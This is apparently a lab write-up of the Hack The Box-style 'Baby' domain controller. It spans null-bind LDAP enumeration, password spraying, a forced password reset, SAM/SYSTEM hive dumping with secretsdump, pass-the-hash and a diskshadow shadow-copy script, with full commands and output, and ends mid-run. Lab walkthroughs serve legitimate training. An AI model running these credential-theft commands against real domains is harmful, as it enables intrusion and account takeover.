Overview
The machine starts by LDAP null bind enumeration that reveals a password in a user description field, spraying it across all domain users finds Caroline.Robinson with a must-change-password status so we force a password reset via smbpasswd to get winrm access, then SeBackupPrivilege is abused with diskshadow to create a VSS snapshot and robocopy to extract ntds.dit and dump domain hashes with secretsdump to pass-the-hash as Administrator
Enumeration
we'll start with nmap as usual
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.234.71 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-03 11:23 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:23
Completed NSE at 11:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:23
Completed NSE at 11:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:23
Completed NSE at 11:23, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:23
Completed Parallel DNS resolution of 1 host. at 11:23, 0.10s elapsed
Initiating Connect Scan at 11:23
Scanning 10.129.234.71 [1000 ports]
Discovered open port 135/tcp on 10.129.234.71
Discovered open port 139/tcp on 10.129.234.71
Discovered open port 3389/tcp on 10.129.234.71
Discovered open port 445/tcp on 10.129.234.71
Discovered open port 53/tcp on 10.129.234.71
Discovered open port 3268/tcp on 10.129.234.71
Discovered open port 636/tcp on 10.129.234.71
Discovered open port 88/tcp on 10.129.234.71
Discovered open port 389/tcp on 10.129.234.71
Discovered open port 3269/tcp on 10.129.234.71
Discovered open port 464/tcp on 10.129.234.71
Discovered open port 593/tcp on 10.129.234.71
Completed Connect Scan at 11:24, 14.66s elapsed (1000 total ports)
Initiating Service scan at 11:24
Scanning 12 services on 10.129.234.71
Completed Service scan at 11:24, 15.78s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.234.71.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:24
NSE Timing: About 99.94% done; ETC: 11:24 (0:00:00 remaining)
Completed NSE at 11:25, 40.14s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 5.45s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Nmap scan report for 10.129.234.71
Host is up, received user-set (0.14s latency).
Scanned at 2026-06-03 11:23:55 PDT for 76s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-03 18:24:18Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| DNS_Tree_Name: baby.vl
| Product_Version: 10.0.20348
| _ System_Time: 2026-06-03T18:24:28+00:00
| _ssl-date: 2026-06-03T18:25:07+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-02T18:17:46
| Not valid after: 2026-12-02T18:17:46
| MD5: 3d47:9d95:f5b7:44a5:20a3:b855:8475:db5a
| SHA-1: f6dd:ef9b:7e40:2924:4e52:4b8e:0143:0e01:2085:0a87
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcigAwIBAgIQF6Zt4P07UbpPqG8besu3ZTANBgkqhkiG9w0BAQsFADAZ
| MRcwFQYDVQQDEw5CYWJ5REMuYmFieS52bDAeFw0yNjA2MDIxODE3NDZaFw0yNjEy
| MDIxODE3NDZaMBkxFzAVBgNVBAMTDkJhYnlEQy5iYWJ5LnZsMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgyeWZ6ED8fpzFC1ThrD+jEjPb5vhcW6wjV1
| 25gRHqTWGJXgdtuf56K42sZdOLHERPj2ezXCKkKswGigLBrtB9uGB+rbnb0KYtmZ
| Y3j8HW5MwH8fiTh9W25f4pMZ/TmKko8MuRsHDEemJTiuq2S5rR4rUZGfMvwXLQUD
| tfDB9/+C58ecxydZVIEwQULaWJnTWf9h6tHW2V8N7RHGeZRI9UDsWn2pr7N6ea3E
| 07j8LiJl9o+hNcgKU2HWLVsxkSgYTyWMgEaU/ljN7S8rPfksfvHVz9AbfC7zio+u
| icesvGiBakP6sd8xtoNF+42ephGWhlNV2046XxpJAvpWy6R3XQIDAQABoyQwIjAT
| BgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQAD
| ggEBAIDTR5lWn60HTD85Q7SnNv5d33+sZI2zChgUWur1XVbaJm+7qhq56uBgWPCN
| 06uSe7UCszGayfhssm12Q98B5E2plRZV2DSZnOaVxv7NvQgcmxV55BorU5KfTjK8
| znXVoBhwDOyLE7IjqQh/IWvzL5vhrxoVP9DE3JEVBpywlz4tPK7FGSSPmlMjXcl8
| zNKwDPHYzufWqQ0yrWb31RAWpKlJ0ENzeB0ybWlDx52hI4EMbTdHmVpVLuX2JwAn
| YOoQXHTx0xhbPo0Xkg4kO9ZH6QEIZ0fRDwYeA1co9XJLHOQQWHPo4UyC+owEC8B1
| ojYaqoVOj/3LvAUnKA4ghipRxk0=
| _-----END CERTIFICATE-----
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| _clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
| smb2-time:
| date: 2026-06-03T18:24:29
| _ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 6299/tcp): CLEAN (Timeout)
| Check 2 (port 53666/tcp): CLEAN (Timeout)
| Check 3 (port 13485/udp): CLEAN (Timeout)
| Check 4 (port 42075/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.60 secondsand we got some SMB,DNS,Kerberos,LDAP so it is obviously an active directory environment and it isn't assumed breached and there is no website for us to get through it what we got here is
- domain name is
baby.vland the hostname isBabyDCso the FQDN isBabyDC.baby.vlso add those to our hosts file - the clock skew is fine in case we'll deal Kerberos authentication
so lets setup the environment by getting a KRB5 file and move it to the etc directory and add the entries to the hosts file
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ echo '10.129.234.71 BabyDC BabyDC.baby.vl baby.vl' | sudo tee -a /etc/hosts
10.129.234.71 BabyDC BabyDC.baby.vl baby.vl
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ nxc smb baby.vl -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [+] krb5 conf saved to: krb5.conf
SMB 10.129.234.71 445 BABYDC [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.234.71 445 BABYDC [+] baby.vl\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.conf as you can see we got the Null Auth is set to True on SMB so we can try Guest accounts if they can access any shares or does some enumeration like brute-force the RID for usernames
But we got the Guest account disabled
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ nxc smb 10.129.234.71 -u 'Guest' -p '' --shares
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Guest: STATUS_ACCOUNT_DISABLEDat this point when we got no share service like FTP or SMB there is 3 options to try here
- timeroast attacks
- pre2k accounts with a wordlist
- ldap user fields
and i started with the pre2k accounts using the tool pre2k but nothing was found out of 2400 possible hostnames
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/pre2k]
└──╼ [★]$ pre2k unauth -d baby.vl -dc-ip 10.129.234.71 -inputfile ../hostnames.txt
___ __
/'___`\ /\ \
_____ _ __ __ /\_\ /\ \\ \ \/'\
/\ '__`\/\`' __\/'__`\ _______\/_/// /__\ \ , <
\ \ \L\ \ \ \//\ __//\______\ // /_\ \\ \ \\`\
\ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
\ \ \/ \/_/ \/____/ \/_____/ \/_/\/_/
\ \_\ v3.1
\/_/
@unsigned_sh0rt
@Tw1sm
[11:38:09] INFO Testing started at 2026-06-03 11:38:09
[11:38:09] INFO Using 10 threads also tried the timeroast but got a single account with the RID 1000 which is the DC itself and there is noway it'll be vulnerable to timeroast (usually you'd try to crack it also but from experience i know it wouldn't work)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ python3 /opt/scripts/timeroast/timeroast.py 10.129.234.71
1000:$sntp-ms$a5f7e23f8a660676d93ff11839f6286a$1c0111e900000000000a03bf4c4f434cedcaee67b2bcc872e1b8428bffbfcd0aedcaf35906b466a4edcaf35906b4a665the last thing is the LDAP users fields and usually you would do this manually using tools like ldapsearch and windapsearch but I've got this great tool that has a good searching algorithm through the fields to identify what is a possible password and what isn't so lets use it and at the end we can also show the manual way
Null Bind LDAP
but for this to work the LDAP null bind must be enabled and as you can see here it is working so lets run my tool directly
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/pre2k]
└──╼ [★]$ nxc ldap 10.129.234.71 -u '' -p ''
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [+] baby.vl\:and as you can see the domain is very small just 2 users only with description and one of them has a password so lets try this password
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ python3 deschunt.py -H 10.129.234.71
[*] Connecting to 10.129.234.71:389 ...
[*] Fetching user descriptions from: DC=baby,DC=vl
════════════════════════════════════════════════════════════
LDAP Description Hunt — Results
════════════════════════════════════════════════════════════
[!] INTERESTING (unique + suspicious) [1]
► Teresa.Bell (Teresa Bell)
Set initial password to BabyStart123!
────────────────────────────────────────────────────────────
Users scanned : 2
Interesting : 1
Unique/clean : 1
Repeated : 0
────────────────────────────────────────────────────────────But when i tried to login it didn't work but here is something interesting the description field said set the initial password to X so whoever is instructing Teresa to might use this password for himself too so lets get a list of users in the domain and try to password spray using the password we found
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ nxc ldap 10.129.234.71 -u Teresa.Bell -p 'BabyStart123!'
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123!so we got a list of users here lets test against them
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ python3 ldaphunt.py -H 10.129.234.71 --users
[*] Connecting to 10.129.234.71:389 ...
[*] Base DN : DC=baby,DC=vl
[*] Phase 1 — pulling confirmed user objects ...
[*] Detected naming convention: first.last (e.g. Jacqueline.Barnett)
[*] Phase 2 — sweeping entire directory for 'first.last' pattern ...
══════════════════════════════════════════════════════════════════════
User Discovery Results
══════════════════════════════════════════════════════════════════════
── Confirmed User Objects [9] ──
Guest
Desc : Built-in account for guest access to the computer/domain
Jacqueline.Barnett
Display : Jacqueline Barnett
Ashley.Webb
Display : Ashley Webb
Hugh.George
Display : Hugh George
Leonard.Dyer
Display : Leonard Dyer
Connor.Wilkinson
Display : Connor Wilkinson
Joseph.Hughes
Display : Joseph Hughes
Kerry.Wilson
Display : Kerry Wilson
Teresa.Bell
Display : Teresa Bell
Desc : Set initial password to BabyStart123!
── Convention Sweep: no extra objects found ──
[+] 8 usernames saved → users.txt
──────────────────────────────────────────────────────────────────────
Confirmed users : 9
Extra (sweep) : 0
Total written : 8 → users.txt
──────────────────────────────────────────────────────────────────────as you can see it didn't work also so at this point i suspected that something was wrong and my tool might've missed something so I went rougue manually to see what happens using ldapsearch
└──╼ [★]$ nxc smb 10.129.234.71 -u users.txt -p 'BabyStart123!'
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILUREShell as Caroline.Robinson
and here is found something interesting there is some additional usernames that didn't appear in our results like Ian.Walker for example so will just add those to our list first then check the reason why they didn't appear
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ ldapsearch -H ldap://10.129.234.71 -x -b "dc=baby,dc=vl" "dn" | grep -v '#'
dn: DC=baby,DC=vl
dn: CN=Administrator,CN=Users,DC=baby,DC=vl
dn: CN=Guest,CN=Users,DC=baby,DC=vl
dn: CN=krbtgt,CN=Users,DC=baby,DC=vl
dn: CN=Domain Computers,CN=Users,DC=baby,DC=vl
dn: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Schema Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
dn: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
dn: CN=Domain Admins,CN=Users,DC=baby,DC=vl
dn: CN=Domain Users,CN=Users,DC=baby,DC=vl
dn: CN=Domain Guests,CN=Users,DC=baby,DC=vl
dn: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
dn: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
dn: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Protected Users,CN=Users,DC=baby,DC=vl
dn: CN=Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
dn: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
dn: CN=dev,CN=Users,DC=baby,DC=vl
dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
dn: CN=Ian Walker,OU=dev,DC=baby,DC=vl
dn: CN=it,CN=Users,DC=baby,DC=vl
dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
ref: ldap://ForestDnsZones.baby.vl/DC=ForestDnsZones,DC=baby,DC=vl
ref: ldap://DomainDnsZones.baby.vl/DC=DomainDnsZones,DC=baby,DC=vl
ref: ldap://baby.vl/CN=Configuration,DC=baby,DC=vlhere is the reason
the users that returned at the first time has the CN Users
but those users weren't part of the users container I guess and I think this is the reason why nxc and my tool missed it
there is a better way to get this list of course but this will do the trick
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ ldapsearch -H ldap://10.129.234.71 -x -b "dc=baby,dc=vl" "dn" | grep -v '#' | grep dn | grep -v Users | cut -d "," -f 1 | cut -d ":" -f 2 | cut -d '=' -f 2 | sed 's/ /./g'
baby
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinsonand as you can see it worked and user Caroline.Robinson must change his password before logging in so lets change the password
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ nxc smb 10.129.234.71 -u users.txt -p 'BabyStart123!'
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\baby:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGEthere is multiple ways to change password either by kpassd but we have to deal with realm and KDC and ldappasswd also but we have to specify the entire Object DN the easiest way is through smbpasswd as you can see
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ smbpasswd -U caroline.robinson -r baby.vl
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinsonand we got WINRM working so lets login
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ nxc smb 10.129.234.71 -u caroline.robinson -p 'Password123!'
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [+] baby.vl\caroline.robinson:Password123!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby/ldaphunt]
└──╼ [★]$ nxc winrm 10.129.234.71 -u caroline.robinson -p 'Password123!'
WINRM 10.129.234.71 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.234.71 5985 BABYDC [+] baby.vl\caroline.robinson:Password123! (Pwn3d!)and we got user
Shell as Administrator
looking if we have any special privilege and we got SeBackupPrivilege which will let us backup the registery hives so we can dump SAM SECURITY and SYSTEM hives and extract hashes locally using secretsdump
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabledwe couldn't get Security but got SAM and SYSTEM and they are more than enough to get the stored creds
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save HKLM\SAM sam.save
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save HKLM\SECURITY SECURITY.save
reg.exe : ERROR: Access is denied.
+ CategoryInfo : NotSpecified: (ERROR: Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save HKLM\SYSTEM SYSTEM.save
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> download SECURITY.save
Info: Downloading C:\Users\Caroline.Robinson\Documents\SECURITY.save to SECURITY.save
Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> download SYSTEM.save
Info: Downloading C:\Users\Caroline.Robinson\Documents\SYSTEM.save to SYSTEM.save
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> download sam.save
Info: Downloading C:\Users\Caroline.Robinson\Documents\sam.save to sam.save
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> and we got the hash for administrator so lets login with WINRM
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ secretsdump.py -sam sam.save -system SYSTEM.save local
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... but trying to login didn't work out
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/baby]
└──╼ [★]$ evil-winrm -i 10.129.234.71 -u Administrator -H 8d992faed38128ae85e95fa35868bb43
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1we are not done with dumping yet we can try multiple dumping stuff for domain credentials for example the diskshadow with a VSS
the VSS always uses the same script which is this
set verbose on
set metadata C:\Windows\Temp\test.cab
set context persistent
add volume C: alias mydrive
create
expose %mydrive% E:so put it in a file and upload it so we can use it with diskshadow that's because we don't have an interactive shell
when i run it i get this
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> diskshadow /s ./script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 6/4/2026 11:52:23 AM
-> set verbose O
SET VERBOSE { ON | OFF }
ON Turn on verbose mode. This provides information about writer inclusion/exclusion.
OFF Turn off verbose mode.
Example: SET VERBOSE ON so the issue is my script is fine but it doesn't read the N after O in the word ON
and this is an issue with diskshadow and windows if your script is written on Linux then moved to windows, so what is the issue ?
I think (just a wild guess) cause it runs on windows it expects the new line to be CRLF which is \r\n but our payload is written on Linux so it is written using with LF only which is \n so when it doesn't see \r at the end of the file the N gets eaten somehow cause it might think the entire line is malformed
I have no idea how does this internally happen or what is the issue but I know how to fix it so lets fix the payload
we'll just substitute at the end of every line with \r
sed -i 's/$/\r/' script.txtor we can do it easier with
└──╼ [★]$ unix2dos script.txt
unix2dos: converting file script.txt to DOS format...now lets run the command again on WINRM
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> diskshadow /s ./script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 6/4/2026 11:59:18 AM
-> set verbose ON
-> set metadata C:\Windows\Temp\test.cab
-> set context persistent
-> add volume C: alias mydrive
-> create
Excluding writer "Shadow Copy Optimization Writer" , because all of its components have been excluded.
Excluding writer "BITS Writer" , because all of its components have been excluded.
* Including writer "Task Scheduler Writer":
+ Adding component: \TasksStore
* Including writer "VSS Metadata Store Writer":
+ Adding component: \WriterMetadataStore
* Including writer "Performance Counters Writer":
+ Adding component: \PerformanceCounters
* Including writer "System Writer":
+ Adding component: \System Files
+ Adding component: \Win32 Services Files
* Including writer "ASR Writer":
+ Adding component: \ASR\ASR
+ Adding component: \Volumes\Volume{711fc68a-0000-0000-0000-100000000000}
+ Adding component: \Disks\harddisk0
+ Adding component: \BCD\BCD
* Including writer "WMI Writer":
+ Adding component: \WMI
* Including writer "DFS Replication service writer":
+ Adding component: \SYSVOL\8D6E7361-AC28-4EC5-9914-ACB6AE407BCB-2EB58465-8BD4-4748-9135-FE1B23D5A20B
* Including writer "Registry Writer":
+ Adding component: \Registry
* Including writer "COM+ REGDB Writer":
+ Adding component: \COM+ REGDB
* Including writer "NTDS":
+ Adding component: \C:_Windows_NTDS\ntds
Alias mydrive for shadow ID {2b911045-4358-4439-aca7-8e4576fdf6bf} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {6fd37dcc-bad7-4ed0-bc9c-ba92f45d56aa} set as environment variable.
Inserted file Manifest.xml into .cab file test.cab
Inserted file BCDocument.xml into .cab file test.cab
Inserted file WM0.xml into .cab file test.cab
Inserted file WM1.xml into .cab file test.cab
Inserted file WM2.xml into .cab file test.cab
Inserted file WM3.xml into .cab file test.cab
Inserted file WM4.xml into .cab file test.cab
Inserted file WM5.xml into .cab file test.cab
Inserted file WM6.xml into .cab file test.cab
Inserted file WM7.xml into .cab file test.cab
Inserted file WM8.xml into .cab file test.cab
Inserted file WM9.xml into .cab file test.cab
Inserted file WM10.xml into .cab file test.cab
Inserted file WM11.xml into .cab file test.cab
Inserted file Dis8DA5.tmp into .cab file test.cab
Querying all shadow copies with the shadow copy set ID {6fd37dcc-bad7-4ed0-bc9c-ba92f45d56aa} * Shadow copy ID = {2b911045-4358-4439-aca7-8e4576fdf6bf} %mydrive%
- Shadow copy set: {6fd37dcc-bad7-4ed0-bc9c-ba92f45d56aa} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 6/4/2026 11:59:37 AM
